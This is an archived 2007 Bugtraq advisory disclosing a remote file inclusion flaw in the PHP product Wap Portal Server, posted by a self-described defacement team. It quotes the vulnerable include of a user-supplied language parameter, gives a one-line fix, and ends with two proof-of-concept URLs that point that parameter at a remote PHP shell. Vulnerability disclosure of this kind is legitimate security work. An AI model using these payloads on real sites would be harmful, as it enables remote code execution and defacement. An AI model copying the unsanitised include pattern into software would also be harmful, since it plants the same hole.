Bugtraq mailing list archives

Wap Portal Serve 1.* <= Remote File Inclusion


From: stormhacker () hotmail com
Date: 3 Feb 2007 23:32:06 -0000

+--------------------------------------------------------------------
+
+ Wap Portal Serve 1.* <= Remote File Inclusion
+
+--------------------------------------------------------------------
+
+ Affected Software .: Wap Portal Server
+ Venedor ...........: http://www.sakic.net
+ Class .............: Remote File Inclusion
+ Risk ..............: high (Remote File Execution)
+ Found by ..........: rUnViRuS
+ Original advisory .: http://www.sec-area.com/ http://www.worlddefacers.de/
+ Contact ...........: stormhacker[at]hotmail[.]com
+
+--------------------------------------------------------------------
+
+ Code index.php:
+
+ .....
+ include("regglobals.php");
+ include("config.php");
+ include("lang/".$language);
+ 
+ .....
+
+--------------------------------------------------------------------
+
+ Solution:
+ Add this line to your php-file:
+
+ $language ="user/dir" //Your language path
+
+--------------------------------------------------------------------
+ PoC:
+
+ http://[target]/index.php?language=http://phpshell
+ http://[target]/admin/index.php?language=http://phpshell
+
+--------------------------------------------------------------------
+ [W]orld [D]efacers [T]eam
+ Greets:
+ || rUnViRuS || - || papipsycho || - || HeX || - || Linux Master || BlackWHITE ||
+ || Pro Hacker || - || DARKFIRE ||
+
+-------------------------[ W D T ]----------------------------------


Current thread: